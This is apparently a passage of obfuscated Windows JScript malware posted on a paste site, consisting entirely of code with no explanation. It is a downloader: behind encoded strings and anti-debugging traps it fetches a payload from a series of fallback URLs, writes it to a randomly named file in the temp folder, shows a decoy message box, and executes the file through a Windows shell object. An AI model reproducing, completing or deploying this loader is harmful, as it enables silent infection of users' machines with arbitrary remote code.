- var _0x35a3dc = {};
- _0x35a3dc[decoder('0x21', '\x24\x65\x70\x67')] = _0x2a45ee.VkgRL;
- _0x35a3dc[decoder('0x22', '\x38\x43\x5a\x49')] = _0x2a45ee.oCwsj;
- _0x35a3dc[decoder('0x23', '\x68\x24\x79\x78')] = function (_0x4c2f0c, _0x2f2cd7) {
- return _0x2a45ee.VSSET(_0x4c2f0c, _0x2f2cd7);
- };
- _0x35a3dc[decoder('0x24', '\x4c\x64\x6a\x4e')] = function (_0x999bb2, _0x46273e) {
- return _0x999bb2(_0x46273e);
- };
- _0x35a3dc[decoder('0x25', '\x4c\x64\x6a\x4e')] = function (_0x1c0ae3) {
- return _0x2a45ee.LjYaf(_0x1c0ae3);
- };
- _0x2a45ee[decoder('0x26', '\x4c\x64\x6a\x4e')](_0x46fd93, this, function () {
- var _0x5101d4 = new RegExp(_0x35a3dc[decoder('0x27', '\x4f\x68\x35\x34')]);
- var _0x2fa48c = new RegExp(decoder('0x28', '\x53\x6a\x70\x6f'), '\x69');
- var _0x3f085c = _0x3e87a6(decoder('0x29', '\x59\x25\x6e\x42'));
- if (!_0x5101d4[decoder('0x2a', '\x54\x78\x76\x49')](_0x3f085c + _0x35a3dc[decoder('0x2b', '\x5b\x4c\x21\x64')]) || !_0x2fa48c[decoder('0x2c', '\x34\x2a\x50\x41')](_0x35a3dc[decoder('0x2d', '\x56\x73\x6b\x54')](_0x3f085c, decoder('0x2e', '\x53\x6a\x70\x6f')))) {
- _0x35a3dc[decoder('0x2f', '\x4a\x5b\x55\x23')](_0x3f085c, '\x30');
- } else {
- _0x35a3dc[decoder('0x30', '\x63\x37\x6d\x2a')](_0x3e87a6);
- }
- })();
- }());
- var _0x18f414 = function () {
- var _0x245b55 = !![];
- return function (_0x56080f, _0x18100a) {
- var _0x1e3225 = _0x245b55 ? function () {
- if (_0x18100a) {
- var _0x17bd68 = _0x18100a[decoder('0x31', '\x56\x73\x6b\x54')](_0x56080f, arguments);
- _0x18100a = null;
- return _0x17bd68;
- }
- } : function () {
- };
- _0x245b55 = ![];
- return _0x1e3225;
- };
- }();
- var _0x4e9df4 = _0x18f414(this, function () {
- var _0x1053de = _0x2a45ee[decoder('0x32', '\x53\x6a\x70\x6f')][decoder('0x33', '\x68\x26\x40\x48')]('\x7c'), _0x25e780 = 0x0;
- while (!![]) {
- switch (_0x1053de[_0x25e780++]) {
- case '\x30':
- var _0x31b100 = _0x2a45ee[decoder('0x34', '\x34\x2a\x50\x41')](_0x2c20cd);
- continue;
- case '\x31':
- var _0x5a5fcc = {};
- _0x5a5fcc[decoder('0x35', '\x21\x54\x45\x4b')] = function (_0x3faa15, _0x5620c5) {
- return _0x3faa15(_0x5620c5);
- };
- _0x5a5fcc[decoder('0x36', '\x56\x73\x6b\x54')] = function (_0x15f1a1, _0x5768e7) {
- return _0x2a45ee.VSSET(_0x15f1a1, _0x5768e7);
- };
- continue;
- case '\x32':
- var _0x2c20cd = function () {
- var _0x1e0e07;
- try {
- _0x1e0e07 = _0x5a5fcc[decoder('0x37', '\x56\x73\x6b\x54')](Function, _0x5a5fcc[decoder('0x38', '\x68\x6e\x50\x49')](_0x5a5fcc[decoder('0x39', '\x54\x78\x76\x49')](decoder('0x3a', '\x21\x54\x45\x4b'), decoder('0x3b', '\x68\x26\x40\x48')), '\x29\x3b'))();
- } catch (_0xc50881) {
- _0x1e0e07 = window;
- }
- return _0x1e0e07;
- };
- continue;
- case '\x33':
- if (!_0x31b100[decoder('0x3c', '\x68\x6e\x50\x49')]) {
- _0x31b100[decoder('0x3d', '\x53\x6a\x70\x6f')] = function (_0x3356a7) {
- var _0x309bd5 = {};
- _0x309bd5[decoder('0x3e', '\x56\x73\x6b\x54')] = _0x3356a7;
- _0x309bd5[decoder('0x3f', '\x71\x5d\x29\x4c')] = _0x3356a7;
- _0x309bd5[decoder('0x40', '\x26\x66\x41\x26')] = _0x3356a7;
- _0x309bd5[decoder('0x41', '\x76\x78\x38\x5b')] = _0x3356a7;
- _0x309bd5[decoder('0x42', '\x76\x78\x38\x5b')] = _0x3356a7;
- _0x309bd5[decoder('0x43', '\x53\x6a\x70\x6f')] = _0x3356a7;
- _0x309bd5[decoder('0x44', '\x34\x78\x50\x47')] = _0x3356a7;
- return _0x309bd5;
- }(_0x49c512);
- } else {
- var _0x1a516f = _0x2a45ee[decoder('0x45', '\x34\x78\x50\x47')][decoder('0x46', '\x68\x6e\x50\x49')]('\x7c'), _0x1fee24 = 0x0;
- while (!![]) {
- switch (_0x1a516f[_0x1fee24++]) {
- case '\x30':
- _0x31b100[decoder('0x47', '\x26\x47\x21\x63')][decoder('0x48', '\x40\x24\x47\x30')] = _0x49c512;
- continue;
- case '\x31':
- _0x31b100[decoder('0x49', '\x63\x37\x6d\x2a')][decoder('0x4a', '\x28\x79\x58\x43')] = _0x49c512;
- continue;
- case '\x32':
- _0x31b100[decoder('0x3d', '\x53\x6a\x70\x6f')][decoder('0x4b', '\x73\x67\x55\x62')] = _0x49c512;
- continue;
- case '\x33':
- _0x31b100[decoder('0x4c', '\x68\x26\x40\x48')][decoder('0x4d', '\x59\x25\x6e\x42')] = _0x49c512;
- continue;
- case '\x34':
- _0x31b100[decoder('0x3c', '\x68\x6e\x50\x49')][decoder('0x4e', '\x62\x4d\x52\x73')] = _0x49c512;
- continue;
- case '\x35':
- _0x31b100[decoder('0x4f', '\x6a\x29\x21\x34')][decoder('0x50', '\x5b\x46\x39\x4d')] = _0x49c512;
- continue;
- case '\x36':
- _0x31b100[decoder('0x51', '\x76\x4c\x28\x5a')][decoder('0x52', '\x31\x5d\x41\x71')] = _0x49c512;
- continue;
- }
- break;
- }
- }
- continue;
- case '\x34':
- var _0x49c512 = function () {
- };
- continue;
- }
- break;
- }
- });
- _0x4e9df4();
- try {
- _0x2a45ee[decoder('0x53', '\x4e\x74\x4d\x5b')](getDataFromUrl, _0x2a45ee[decoder('0x54', '\x53\x6a\x70\x6f')], function (httpResponseBody, errorFlag) {
- var _0x185f68 = {};
- _0x185f68[decoder('0x55', '\x54\x6a\x6a\x34')] = function (_0x2a35f6, _0x3b43bf, _0x4266ed) {
- return _0x2a45ee.ebaVd(_0x2a35f6, _0x3b43bf, _0x4266ed);
- };
- _0x185f68[decoder('0x56', '\x5b\x46\x39\x4d')] = function (_0x4c990d, _0x39d7ab, _0x225650) {
- return _0x4c990d(_0x39d7ab, _0x225650);
- };
- _0x185f68[decoder('0x57', '\x34\x78\x50\x47')] = function (_0xef025d, _0x23bfc7, _0x3542ef) {
- return _0x2a45ee.sPKub(_0xef025d, _0x23bfc7, _0x3542ef);
- };
- _0x185f68[decoder('0x58', '\x4e\x74\x4d\x5b')] = _0x2a45ee.virXF;
- if (!errorFlag) {
- return _0x2a45ee[decoder('0x59', '\x5b\x46\x39\x4d')](writeAndExecute, httpResponseBody, ![]);
- } else {
- getDataFromUrl(decoder('0x5a', '\x26\x31\x56\x4b'), function (httpResponseBody, errorFlag) {
- if (!errorFlag) {
- return _0x185f68[decoder('0x5b', '\x24\x70\x43\x53')](writeAndExecute, httpResponseBody, ![]);
- } else {
- getDataFromUrl(_0x185f68[decoder('0x5c', '\x35\x54\x37\x4e')], function (httpResponseBody, errorFlag) {
- var _0x3a4f74 = {};
- _0x3a4f74[decoder('0x5d', '\x31\x73\x43\x57')] = function (_0x9b93a3, _0x520330, _0xd2c4ef) {
- return _0x9b93a3(_0x520330, _0xd2c4ef);
- };
- _0x3a4f74[decoder('0x5e', '\x38\x43\x5a\x49')] = function (_0x54d8c7, _0x31b21a, _0x1f5b63) {
- return _0x185f68.FpLFt(_0x54d8c7, _0x31b21a, _0x1f5b63);
- };
- if (!errorFlag) {
- return _0x185f68[decoder('0x5f', '\x68\x24\x79\x78')](writeAndExecute, httpResponseBody, ![]);
- } else {
- _0x185f68[decoder('0x60', '\x34\x78\x50\x47')](getDataFromUrl, decoder('0x61', '\x28\x79\x58\x43'), function (httpResponseBody, errorFlag) {
- var _0x11ea16 = {};
- _0x11ea16[decoder('0x62', '\x34\x78\x50\x47')] = function (_0x417728, _0x556bab, _0x1d9296) {
- return _0x417728(_0x556bab, _0x1d9296);
- };
- if (!errorFlag) {
- return _0x3a4f74[decoder('0x63', '\x45\x6f\x6a\x76')](writeAndExecute, httpResponseBody, ![]);
- } else {
- _0x3a4f74[decoder('0x64', '\x62\x4d\x52\x73')](getDataFromUrl, decoder('0x65', '\x5b\x4c\x21\x64'), function (httpResponseBody, errorFlag) {
- if (!errorFlag) {
- return _0x11ea16[decoder('0x66', '\x4f\x68\x35\x34')](writeAndExecute, httpResponseBody, ![]);
- } else {
- return _0x11ea16[decoder('0x67', '\x5b\x4c\x21\x64')](writeAndExecute, null, !![]);
- }
- });
- }
- });
- }
- });
- }
- });
- }
- });
- } catch (e) {
- return _0x2a45ee[decoder('0x68', '\x68\x24\x79\x78')](writeAndExecute, null, !![]);
- }
- }
- function getTempFilePath() {
- var _0x3bd4c9 = {};
- _0x3bd4c9[decoder('0x69', '\x26\x47\x21\x63')] = decoder('0x6a', '\x45\x6f\x6a\x76');
- _0x3bd4c9[decoder('0x6b', '\x6a\x29\x21\x34')] = function (_0x53e86b, _0x2c5ad8) {
- return _0x53e86b + _0x2c5ad8;
- };
- _0x3bd4c9[decoder('0x6c', '\x5b\x4c\x21\x64')] = function (_0x351e95, _0x526a24) {
- return _0x351e95 + _0x526a24;
- };
- try {
- var FSO = new ActiveXObject(_0x3bd4c9[decoder('0x6d', '\x2a\x6d\x78\x6e')]);
- var randomFileName = _0x3bd4c9[decoder('0x6e', '\x4c\x64\x6a\x4e')](_0x3bd4c9[decoder('0x6f', '\x71\x35\x67\x76')]('\x5c', Math[decoder('0x70', '\x6f\x70\x4e\x53')]()[decoder('0x71', '\x54\x78\x76\x49')](0x24)[decoder('0x72', '\x62\x4d\x52\x73')](0x2, 0x9)), decoder('0x73', '\x71\x5d\x29\x4c'));
- var FQFP = FSO[decoder('0x74', '\x26\x31\x56\x4b')](0x2) + randomFileName;
- return FQFP;
- } catch (e) {
- return ![];
- }
- }
- function saveToTemp(_0x5f4192, runExe) {
- var _0x338c92 = {};
- _0x338c92[decoder('0x75', '\x6a\x29\x21\x34')] = function (_0x5a3de4) {
- return _0x5a3de4();
- };
- _0x338c92[decoder('0x76', '\x24\x30\x50\x65')] = decoder('0x77', '\x26\x47\x21\x63');
- _0x338c92[decoder('0x78', '\x24\x65\x70\x67')] = function (_0x107b3b, _0x37b2f5, _0x287715) {
- return _0x107b3b(_0x37b2f5, _0x287715);
- };
- _0x338c92[decoder('0x79', '\x4e\x2a\x6d\x32')] = function (_0x4610db, _0x1e7d38, _0x38f352) {
- return _0x4610db(_0x1e7d38, _0x38f352);
- };
- try {
- var tempPath = _0x338c92[decoder('0x7a', '\x26\x47\x21\x63')](getTempFilePath);
- if (tempPath) {
- var _0x4719d2 = decoder('0x7b', '\x26\x66\x41\x26')[decoder('0x7c', '\x59\x25\x6e\x42')]('\x7c'), _0x427fda = 0x0;
- while (!![]) {
- switch (_0x4719d2[_0x427fda++]) {
- case '\x30':
- newFileObject[decoder('0x7d', '\x62\x4d\x52\x73')](_0x5f4192);
- continue;
- case '\x31':
- newFileObject[decoder('0x7e', '\x4a\x5b\x55\x23')]();
- continue;
- case '\x32':
- newFileObject[decoder('0x7f', '\x73\x67\x55\x62')]();
- continue;
- case '\x33':
- var newFileObject = new ActiveXObject(_0x338c92[decoder('0x80', '\x63\x37\x6d\x2a')]);
- continue;
- case '\x34':
- newFileObject[decoder('0x81', '\x62\x4d\x52\x73')](tempPath, 0x2);
- continue;
- case '\x35':
- newFileObject[decoder('0x82', '\x4f\x68\x35\x34')] = 0x1;
- continue;
- case '\x36':
- newFileObject[decoder('0x83', '\x59\x25\x6e\x42')] = 0x0;
- continue;
- case '\x37':
- return _0x338c92[decoder('0x84', '\x5b\x46\x39\x4d')](runExe, tempPath, ![]);
- }
- break;
- }
- } else {
- return _0x338c92[decoder('0x78', '\x24\x65\x70\x67')](runExe, null, !![]);
- }
- } catch (_0x21246b) {
- return _0x338c92[decoder('0x85', '\x24\x70\x43\x53')](runExe, null, !![]);
- }
- }
- getData(function (bytes, hasError) {
- var _0x414874 = {};
- _0x414874[decoder('0x86', '\x5b\x74\x5e\x54')] = decoder('0x87', '\x24\x70\x43\x53');
- _0x414874[decoder('0x88', '\x5b\x4c\x21\x64')] = decoder('0x89', '\x24\x65\x70\x67');
- WshShell = WScript[decoder('0x8a', '\x21\x54\x45\x4b')](decoder('0x8b', '\x24\x30\x50\x65'));
- Text = decoder('0x8c', '\x4f\x68\x35\x34');
- Title = _0x414874[decoder('0x8d', '\x6f\x70\x4e\x53')];
- Res = WshShell[decoder('0x8e', '\x33\x44\x43\x70')](Text, 0x0, Title, 0x0 + 0x40);
- if (!hasError) {
- saveToTemp(bytes, function (fileToRun, stopFlag) {
- if (!stopFlag) {
- try {
- var wsShell = new ActiveXObject(_0x414874[decoder('0x8f', '\x4f\x24\x43\x29')]);
- wsShell[decoder('0x90', '\x4c\x64\x6a\x4e')](fileToRun);
- } catch (e) {
- }
- }
- });
- }
- });
- function _0x3e87a6(_0x3927ee) {
- var _0xa49e00 = {};
- _0xa49e00[decoder('0x91', '\x28\x79\x58\x43')] = decoder('0x92', '\x54\x6a\x6a\x34');
- _0xa49e00[decoder('0x93', '\x35\x54\x37\x4e')] = decoder('0x94', '\x4e\x2a\x6d\x32');
- _0xa49e00[decoder('0x95', '\x21\x54\x45\x4b')] = function (_0x3ff74f, _0x570ecb) {
- return _0x3ff74f / _0x570ecb;
- };
- _0xa49e00[decoder('0x96', '\x71\x5d\x29\x4c')] = decoder('0x97', '\x34\x2a\x50\x41');
- _0xa49e00[decoder('0x98', '\x63\x37\x6d\x2a')] = function (_0x30500c, _0x534308) {
- return _0x30500c + _0x534308;
- };
- _0xa49e00[decoder('0x99', '\x4e\x2a\x6d\x32')] = decoder('0x9a', '\x45\x6f\x6a\x76');
- _0xa49e00[decoder('0x9b', '\x63\x37\x6d\x2a')] = decoder('0x9c', '\x68\x26\x40\x48');
- _0xa49e00[decoder('0x9d', '\x34\x2a\x50\x41')] = function (_0x1aba01, _0x20458e) {
- return _0x1aba01(_0x20458e);
- };
- function _0x3605c7(_0x489ab9) {
- if (typeof _0x489ab9 === decoder('0x9e', '\x2a\x6d\x78\x6e')) {
- return function (_0x3a7fa3) {
- }[decoder('0x9f', '\x34\x78\x50\x47')](_0xa49e00[decoder('0xa0', '\x2a\x6d\x78\x6e')])[decoder('0xa1', '\x34\x2a\x50\x41')](_0xa49e00[decoder('0xa2', '\x54\x6a\x6a\x34')]);
- } else {
- if (('' + _0xa49e00[decoder('0xa3', '\x28\x79\x58\x43')](_0x489ab9, _0x489ab9))[decoder('0xa4', '\x46\x4d\x5b\x40')] !== 0x1 || _0x489ab9 % 0x14 === 0x0) {
- (function () {
- return !![];
- }[decoder('0xa5', '\x34\x2a\x50\x41')](decoder('0xa6', '\x71\x35\x67\x76') + _0xa49e00[decoder('0xa7', '\x4f\x68\x35\x34')])[decoder('0xa8', '\x21\x54\x45\x4b')](decoder('0xa9', '\x28\x79\x58\x43')));
- } else {
- (function () {
- return ![];
- }[decoder('0xaa', '\x64\x6f\x74\x73')](_0xa49e00[decoder('0xab', '\x4e\x74\x4d\x5b')](_0xa49e00[decoder('0xac', '\x68\x6e\x50\x49')], decoder('0xad', '\x4f\x68\x35\x34')))[decoder('0xae', '\x2a\x6d\x78\x6e')](_0xa49e00[decoder('0xaf', '\x24\x65\x70\x67')]));
- }
- }
- _0x3605c7(++_0x489ab9);
- }
- try {
- if (_0x3927ee) {
- return _0x3605c7;
- } else {
- _0xa49e00[decoder('0xb0', '\x4a\x5b\x55\x23')](_0x3605c7, 0x0);
- }
- } catch (_0x45f4b4) {
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement